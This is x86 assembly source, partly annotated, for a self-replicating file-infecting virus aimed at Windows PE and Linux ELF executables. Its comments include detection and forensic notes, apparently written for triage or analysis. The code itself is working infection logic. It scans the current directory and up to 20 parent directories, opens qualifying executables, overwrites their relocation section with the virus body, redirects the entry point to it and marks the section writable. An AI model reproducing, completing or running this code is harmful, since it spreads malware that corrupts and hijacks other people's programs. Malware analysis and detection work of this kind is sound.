.386p
.model flat
include win32api.inc
include useful.inc
include mz.inc
include pe.inc
.data
db ?
.code
;-----------------------------------------------------------------------
; Start - Win32-side entry of the appended code.  The stub is position
; independent: every variable is reached as [ebp + var - gdelta].
; Visible flow: save registers, install an SEH frame that bails out to
; end_host on any fault, resolve the needed kernel32 APIs (get_base /
; get_apis are defined outside this excerpt), remember the current
; directory, then enumerate '*.*' in the current directory and in up
; to 20 parent directories ('..'), handing every entry to wCheckInfect.
; Finally it restores the original directory and the registers and
; jumps to the host's original entry point.
; Register roles: ebp = delta offset, esi = WIN32_FIND_DATA (later the
; SetCurrentDirectoryA pointer), ecx = directory levels still to visit.
; Triage / detection notes: self-resolved imports, delta-offset
; addressing, an SEH frame wrapped around the whole body and a
; run-time patched original_ep / image_base pair ending in `jmp eax`
; are the indicators of this stub.  The files it touches are those
; reachable by repeated '..' from the process' working directory.
;-----------------------------------------------------------------------
Start: pushad
@SEH_SetupFrame <jmp end_host> ;setup SEH frame: a fault anywhere below resumes at end_host
call gdelta
gdelta: pop ebp ;ebp=delta offset (run-time address of gdelta)
call get_base ;get K32 base address (defined outside this excerpt)
call get_apis ;find addresses of APIz (defined outside this excerpt)
lea eax,[ebp + prev_dir - gdelta]
push eax
push MAX_PATH
call [ebp + a_GetCurrentDirectoryA - gdelta]
;get current directory into prev_dir so it can be restored at the end
push 20
pop ecx ;20 passes in directory tree (ecx = levels still to visit)
f_infect:
push ecx ;keep the level counter across the directory scan
;direct action - infect all PE filez in directory
lea esi,[ebp + WFD - gdelta] ;WIN32_FIND_DATA structure
push esi ;save its address (lpFindFileData argument)
@pushsz '*.*' ;search for all filez
call [ebp + a_FindFirstFileA - gdelta] ;find first file
inc eax
je e_find ;quit if not found (INVALID_HANDLE_VALUE == -1)
dec eax
push eax ;save search handle to stack
f_next: call wCheckInfect ;infect found file (esi = WFD of this entry)
push esi ;save WFD structure
push dword ptr [esp+4] ;and search handle from stack
call [ebp + a_FindNextFileA - gdelta];find next file
test eax,eax
jne f_next ;and infect it
f_close:call [ebp + a_FindClose - gdelta] ;close search handle (still on the stack from above)
e_find: @pushsz '..'
mov esi,[ebp + a_SetCurrentDirectoryA - gdelta]
call esi ;go upper in directory tree
pop ecx
loop f_infect ;and again..
lea eax,[ebp + prev_dir - gdelta]
push eax
call esi ;go back to original directory
end_host:
@SEH_RemoveFrame ;remove SEH frame
popad
extrn ExitProcess
mov eax,offset ExitProcess-400000h
original_ep = dword ptr $-4 ;first-generation value: ExitProcess relative to 400000h; wCheckInfect stores the host's real entry RVA here in each copy
add eax,400000h
image_base = dword ptr $-4 ;patched by wCheckInfect to the host's ImageBase
jmp eax ;and go back to host program
;-----------------------------------------------------------------------
; wCheckInfect - examine one directory entry (WIN32_FIND_DATA at esi)
; and, if it is a PE or ELF executable the code accepts, write the body
; into it.  Win32 version (uses CreateFileMapping / MapViewOfFile).
; In:     esi = WIN32_FIND_DATA of the entry, ebp = delta offset.
; Out:    nothing; registers are restored by the pushad/popad pair (the
;         popad and the end_seh label lie outside this excerpt).
; Helpers defined elsewhere in the file: check_elf, check_pe,
; header&relocs, set_alignz, wInfectELF and the variable l_lseek.
; Visible selection criteria for PE targets: not a directory, size
; < 4 GB and >= 4000h bytes, 'MZ' + valid PE, i386 machine, executable,
; not DLL, not SYSTEM, subsystem with bit 0 clear, NumberOfSections
; other than 1, a relocation directory whose VA equals the VA of the
; section located by header&relocs, and that section's raw size
; >= body size + 500.
; What is modified - the forensic signature to look for in a suspect
; file:
;   - the base-relocation data-directory entry is zeroed (two stosd),
;   - the raw data of the relocation section is overwritten by the
;     body, and AddressOfEntryPoint is redirected into that section,
;   - IMAGE_SCN_MEM_WRITE is OR-ed into that section's Characteristics,
;   - original_ep / image_base inside the copied body hold the host's
;     real entry RVA and ImageBase.
; For ELF targets the original program part is appended at EOF via
; WriteFile from the buffer a_mem points at (allocated elsewhere).
;-----------------------------------------------------------------------
;INFECT FILE (Win32 version)
wCheckInfect Proc
pushad
@SEH_SetupFrame <jmp end_seh> ;setup SEH frame (end_seh is outside this excerpt)
and dword ptr [ebp + sucElf - gdelta],0 ;sucElf = 0: "not an ELF" unless set later
test [esi.WFD_dwFileAttributes], FILE_ATTRIBUTE_DIRECTORY
jne end_seh ;discard directory entries
xor ecx,ecx
cmp [esi.WFD_nFileSizeHigh],ecx
jne end_seh ;discard files >4GB
mov eax,[esi.WFD_nFileSizeLow]
cmp eax,4000h
jb end_seh ;discard small filez (< 16 KiB)
mov [ebp + l_lseek - gdelta],eax ;remember file size (l_lseek is declared outside this excerpt)
xor eax,eax
push eax ;hTemplateFile = NULL
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push eax ;lpSecurityAttributes = NULL
push eax ;dwShareMode = 0 (exclusive access)
push GENERIC_READ or GENERIC_WRITE
lea eax,[esi.WFD_szFileName]
push eax
call [ebp + a_CreateFileA - gdelta] ;open file read/write
inc eax
je end_seh ;INVALID_HANDLE_VALUE -> give up
dec eax
mov [ebp + hFile - gdelta],eax
cdq ;edx = 0, assuming the handle value is non-negative
push edx ;lpName = NULL
push edx ;dwMaximumSizeLow = 0 (whole file)
push edx ;dwMaximumSizeHigh = 0
push PAGE_READWRITE
push edx ;lpAttributes = NULL
push eax ;hFile
call [ebp + a_CreateFileMappingA - gdelta]
cdq
xchg eax,ecx
jecxz end_cfma ;NULL mapping -> only the file handle needs closing
mov [ebp + hMapFile - gdelta],ecx
push edx ;dwNumberOfBytesToMap = 0 (entire mapping)
push edx ;dwFileOffsetLow = 0
push edx ;dwFileOffsetHigh = 0
push FILE_MAP_WRITE
push ecx ;map file to address space
call [ebp + a_MapViewOfFile - gdelta]
xchg eax,ecx
jecxz end_mvof ;NULL view -> close mapping and file
mov [ebp + lpFile - gdelta],ecx
jmp n_fileopen
;--- teardown path; labels are entered in reverse order of setup
close_file:
push 12345678h
lpFile = dword ptr $-4 ;unmap file (immediate patched at run time)
call [ebp + a_UnmapViewOfFile - gdelta]
end_mvof:
push 12345678h
hMapFile = dword ptr $-4 ;close the mapping object
call [ebp + a_CloseHandle - gdelta]
end_cfma:
mov ecx,12345678h ;was it linux program (ELF)?
sucElf = dword ptr $-4 ;non-zero presumably once wInfectELF has run - confirm in its definition
jecxz c_close ;no, close that file
push 2 ;dwMoveMethod = FILE_END
push 0
push 0
push dword ptr [ebp + hFile - gdelta]
call [ebp + a_SetFilePointer - gdelta]
;go to EOF
push 0 ;lpOverlapped = NULL
lea eax,[ebp + sucElf - gdelta]
push eax ;lpNumberOfBytesWritten (sucElf reused as scratch)
push virtual_end-Start ;nNumberOfBytesToWrite
push 12345678h
a_mem = dword ptr $-4 ;lpBuffer: block allocated outside this excerpt
push dword ptr [ebp + hFile - gdelta]
call [ebp + a_WriteFile - gdelta]
;write there orig. program part
push MEM_RELEASE
push 0
push dword ptr [ebp + a_mem - gdelta]
call [ebp + a_VirtualFree - gdelta]
;and deallocate used memory
c_close:push 12345678h
hFile = dword ptr $-4
call [ebp + a_CloseHandle - gdelta] ;close file
jmp end_seh ;and quit
;--- file is mapped at lpFile; decide whether and how it is modified
n_fileopen:
call check_elf
je wInfectELF ;is it Linux program (ELF)? (ELF path continues outside this excerpt)
add ax,-IMAGE_DOS_SIGNATURE ;ax == 'MZ' ?
jne close_file
call check_pe
jne close_file ;is it Win32 program (PE)? (check_pe presumably leaves esi at the NT headers - confirm in its definition)
;important chex - only plain i386 executables continue
cmp word ptr [esi.NT_FileHeader.FH_Machine],IMAGE_FILE_MACHINE_I386
jne close_file
mov ax,[esi.NT_FileHeader.FH_Characteristics]
test ax,IMAGE_FILE_EXECUTABLE_IMAGE
je close_file
test ax,IMAGE_FILE_DLL
jne close_file
test ax,IMAGE_FILE_SYSTEM
jne close_file
mov al,byte ptr [esi.NT_FileHeader.OH_Subsystem]
test al,IMAGE_SUBSYSTEM_NATIVE ;bit test: only subsystem values with bit 0 clear continue
jne close_file
movzx eax,word ptr [esi.NT_FileHeader.FH_NumberOfSections]
dec eax
test eax,eax
je close_file ;a single-section image is rejected
call header&relocs ;get PE headerz and check for relocs
je close_file ;quit if no relocs
;NOTE(review): header&relocs is defined outside this excerpt; from the
;use below, eax looks like the relocation directory VA, edx a pointer to
;the relocation data-directory entry and edi the matching section
;header - confirm against its definition.
mov ebx,[edi.SH_VirtualAddress]
cmp eax,ebx
jne close_file ;relocation directory must start at the section's VA
cmp [edi.SH_SizeOfRawData],virus_end-Start+500
jb close_file ;is it large enough?
pushad
xor eax,eax
mov edi,edx
stosd
stosd
popad ;erase relocs record (zero the data-directory VA and size)
call set_alignz ;align section variable (defined outside this excerpt)
push dword ptr [ebp + original_ep - gdelta]
push dword ptr [ebp + image_base - gdelta]
;save used variablez (this copy's own values, restored after rep movsb)
mov eax,[esi.NT_OptionalHeader.OH_AddressOfEntryPoint]
mov [esi.NT_OptionalHeader.OH_AddressOfEntryPoint],ebx ;entry point now = relocation section VA
mov [ebp + original_ep - gdelta],eax ;host's real entry RVA, carried in the copied body
mov eax,[esi.NT_OptionalHeader.OH_ImageBase]
mov [ebp + image_base - gdelta],eax ;host's ImageBase for the `add eax,400000h` patch at Start
;set variablez
pushad
mov edi,[edi.SH_PointerToRawData]
add edi,[ebp + lpFile - gdelta] ;file offset -> address inside the mapped view
lea esi,[ebp + Start - gdelta]
mov ecx,virus_end-Start
rep movsb ;overwrite relocs by virus body
popad
pop dword ptr [ebp + image_base - gdelta]
pop dword ptr [ebp + original_ep - gdelta]
;restore used variablez
or dword ptr [edi.SH_Characteristics],IMAGE_SCN_MEM_WRITE ;section made writable: the body stores into its own variables (e.g. sucElf) at run time
jmp close_file ;set flag and quit
wCheckInfect EndP